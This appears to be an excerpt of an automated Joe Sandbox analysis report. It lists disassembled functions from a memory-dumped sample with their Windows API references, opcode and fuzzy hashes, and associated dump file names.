                                                                                                                                                                            • Instruction ID: eae25039ec1cbd6b1f7bd54493bc312c12dcade51927d66a45026ca88f90a471
                                                                                                                                                                            • Opcode Fuzzy Hash: 00b65c27536f93b5c17ae57e0dff640d174d95e5b7825e5c10e504351a4a4402
                                                                                                                                                                            • Instruction Fuzzy Hash: E641A371D40654AADB24DB60CC51BEAB37AAF00750F0800EBE58D93252DF785EC9EB50
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: dae3b431c870d71d727c354573168df793a12a9fb5c2d7b2e8ade3e268e813f8
                                                                                                                                                                            • Instruction ID: 848fe7a68ba91b96664f43a4689c4b50aa99daeb45249fbff5d72eedee88d254
                                                                                                                                                                            • Opcode Fuzzy Hash: dae3b431c870d71d727c354573168df793a12a9fb5c2d7b2e8ade3e268e813f8
                                                                                                                                                                            • Instruction Fuzzy Hash: C42104B1E40255ABDB14DF76DC42A6A77ACFB44324F00023AE509EB682E7749D00D6A8
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FE9EF4
                                                                                                                                                                              • Part of subcall function 00FD137D: __EH_prolog.LIBCMT ref: 00FD1382
                                                                                                                                                                              • Part of subcall function 00FD137D: new.LIBCMT ref: 00FD13FA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 45791b9f60525faade7721d344bd980179f2616c6292d2977d0c98858dda65db
                                                                                                                                                                            • Instruction ID: d02c2e38cd8c790842c6577acf4b95c3df28436f477413c87e838abee408722a
                                                                                                                                                                            • Opcode Fuzzy Hash: 45791b9f60525faade7721d344bd980179f2616c6292d2977d0c98858dda65db
                                                                                                                                                                            • Instruction Fuzzy Hash: 78215E71D04289AACF14DF95DD819EEB7F5BF59310F0404AEE809A7302D779AE05EB60
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 1f30d26bf0e381434d77efb4cd95f7bd8005450bef81a3e7b34cb769f00c3178
                                                                                                                                                                            • Instruction ID: 957183b621fa0203ad97d45a204c7afcb4a26df85fb256f5a864b80eb8a50d76
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f30d26bf0e381434d77efb4cd95f7bd8005450bef81a3e7b34cb769f00c3178
                                                                                                                                                                            • Instruction Fuzzy Hash: F9118277D00529ABCF12AB98CC419EEB737AF48750F094116F810A7352DB788D05AAE0
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: 3f627c6a234abfd939626c83ef9209351d310bff55f4d113c19eeba87a7b9492
                                                                                                                                                                            • Instruction ID: 07cb4d1c46bddbb5d7563cb5cf95f4d787a9a6156dc06ac96aca127588f41f67
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f627c6a234abfd939626c83ef9209351d310bff55f4d113c19eeba87a7b9492
                                                                                                                                                                            • Instruction Fuzzy Hash: 7FE0A03294832D66D63136754D00B7EBA49EF017B0F1B0161EF54960B4CF2CCE00A2E1
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD5A22
                                                                                                                                                                              • Part of subcall function 00FDAD1B: __EH_prolog.LIBCMT ref: 00FDAD20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 1df22924f91f28f5aedbbfaa871d75eb178bcb2727a5991f19f52c942bb3537b
                                                                                                                                                                            • Instruction ID: 717e45b10ecc80d44c3202a8fdb6828076fc03a8c19b87d207de3d9130082f62
                                                                                                                                                                            • Opcode Fuzzy Hash: 1df22924f91f28f5aedbbfaa871d75eb178bcb2727a5991f19f52c942bb3537b
                                                                                                                                                                            • Instruction Fuzzy Hash: 86016D70A19684DAD715F7A4C905BEEB7A69F15310F04059EA44B53382CBBC2B08E762
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00FDA1E0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                            • Opcode ID: f428d7b119a417b423f8270bf221df50f6a9fdddbbce4b5b9d7840a46d76e333
                                                                                                                                                                            • Instruction ID: 62957b132a1f891aef61401165e90c3af8f25ecf93b07b2e7bb363bde130b57f
                                                                                                                                                                            • Opcode Fuzzy Hash: f428d7b119a417b423f8270bf221df50f6a9fdddbbce4b5b9d7840a46d76e333
                                                                                                                                                                            • Instruction Fuzzy Hash: 84F05431409780AACA225BB448057CBBB926F15332F188A4AF1FD52292C6BA5095AB36
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00FE031D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExecutionStateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2211380416-0
                                                                                                                                                                            • Opcode ID: 94ab8f2ba39a5977890e85efd394baea81a180e12c5e462e0f0de40f8d315763
                                                                                                                                                                            • Instruction ID: 6a8e02fdaebf2832cd379af672df94389632e7363564b54ed63bb387142f936e
                                                                                                                                                                            • Opcode Fuzzy Hash: 94ab8f2ba39a5977890e85efd394baea81a180e12c5e462e0f0de40f8d315763
                                                                                                                                                                            • Instruction Fuzzy Hash: 71D01221A151D016DA227625A9557FE36178F86761F09046AB0C5663CFCE9E08CAB3A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileType.KERNEL32(000000FF,00FD9683), ref: 00FD9751
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                                            • Opcode ID: 215afba638ef037cfce40115b95e9e541d9b389fa3345f1bd251391a9801176d
                                                                                                                                                                            • Instruction ID: 4e80bba5c97678044a3b4890d64fc0341476e1bd258c5bb3a4d7f995c20d2665
                                                                                                                                                                            • Opcode Fuzzy Hash: 215afba638ef037cfce40115b95e9e541d9b389fa3345f1bd251391a9801176d
                                                                                                                                                                            • Instruction Fuzzy Hash: FBD0123093530095CF715E784E0905566579F43376B3CC6A6E075C41A6C762C803F500
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00FECA23
                                                                                                                                                                              • Part of subcall function 00FEA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FEA399
                                                                                                                                                                              • Part of subcall function 00FEA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FEA3AA
                                                                                                                                                                              • Part of subcall function 00FEA388: IsDialogMessageW.USER32(000304CA,?), ref: 00FEA3BE
                                                                                                                                                                              • Part of subcall function 00FEA388: TranslateMessage.USER32(?), ref: 00FEA3CC
                                                                                                                                                                              • Part of subcall function 00FEA388: DispatchMessageW.USER32(?), ref: 00FEA3D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 897784432-0
                                                                                                                                                                            • Opcode ID: 72d052ebc8c4434ae2d7d5712b27d45df3c4992e6414c9f56e933be3febb7c76
                                                                                                                                                                            • Instruction ID: 8b971ab0808df4d3e21a9b0c25418cda2d6e00b8b36a61a4f9ef232f7bbe190f
                                                                                                                                                                            • Opcode Fuzzy Hash: 72d052ebc8c4434ae2d7d5712b27d45df3c4992e6414c9f56e933be3febb7c76
                                                                                                                                                                            • Instruction Fuzzy Hash: 2AD09E35144300AAD7122B91CE06F1A7AB6AB8CB04F004554B285740E1C667AD20AB12
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                            • Opcode ID: 7b46d62d6826b4eb40e5bca59d8793a71afddf3f62f6f72b41c45c2310913014
                                                                                                                                                                            • Instruction ID: ce1fd9b621dd2b485b8963c7ddb6245413e49a2f78fa7cec52bba3bf64546810
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b46d62d6826b4eb40e5bca59d8793a71afddf3f62f6f72b41c45c2310913014
                                                                                                                                                                            • Instruction Fuzzy Hash: F6D0C971410311CFE3B19F28E404782BBE1AF08321B15882E90D9C2214E6754880CF40
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 48d8bbdf0581545e7e229fe2c274468ea7bb62c7ddf51f7613f58452e035cc9d
                                                                                                                                                                            • Instruction ID: 28d094d6044024e912d40582d1036db3c2aa93f35219ebf5348bc989659ef5e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 48d8bbdf0581545e7e229fe2c274468ea7bb62c7ddf51f7613f58452e035cc9d
                                                                                                                                                                            • Instruction Fuzzy Hash: F0B0128236C240EC300A6187AD02D3A060CD2C0B14730C40FF084C6486D4494C012131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 5f24c8006abdccab8db42bccaf59292d9f2a93e6623566866fb408b14fc6a0a0
                                                                                                                                                                            • Instruction ID: 43641e7f2f36ee0f262ba2076c3a65ebc693ae3d66591ab8409d6cbd3e9fbc85
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f24c8006abdccab8db42bccaf59292d9f2a93e6623566866fb408b14fc6a0a0
                                                                                                                                                                            • Instruction Fuzzy Hash: 10B0128236C280EC300AB287AD02D3B020CE2C0B14730841FF084C58C5D4494C012131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 02e630529be5244636abb1950cc93d4fd214b8f33fb14d8747ca16fae30c794f
                                                                                                                                                                            • Instruction ID: 6993d6b2e86c46b873d78f387e41c90802ee03182173f2976c471fb7414e12fd
                                                                                                                                                                            • Opcode Fuzzy Hash: 02e630529be5244636abb1950cc93d4fd214b8f33fb14d8747ca16fae30c794f
                                                                                                                                                                            • Instruction Fuzzy Hash: B0B0128236C240EC300A6187AC02D3A071CD2C0B14730C50FF484C6486D4484C002131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: f3548fdb4661236e077120232eb731b8032fac39c1de65558d8eede439f26945
                                                                                                                                                                            • Instruction ID: 951e89448daca77978be2a94da57dd36c71942622514ea4072a078a3cd54c42f
                                                                                                                                                                            • Opcode Fuzzy Hash: f3548fdb4661236e077120232eb731b8032fac39c1de65558d8eede439f26945
                                                                                                                                                                            • Instruction Fuzzy Hash: D1B0128636C240EC300A6187AC02D3A020CE2C0B14730C80FF084C54CDD8484C402131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
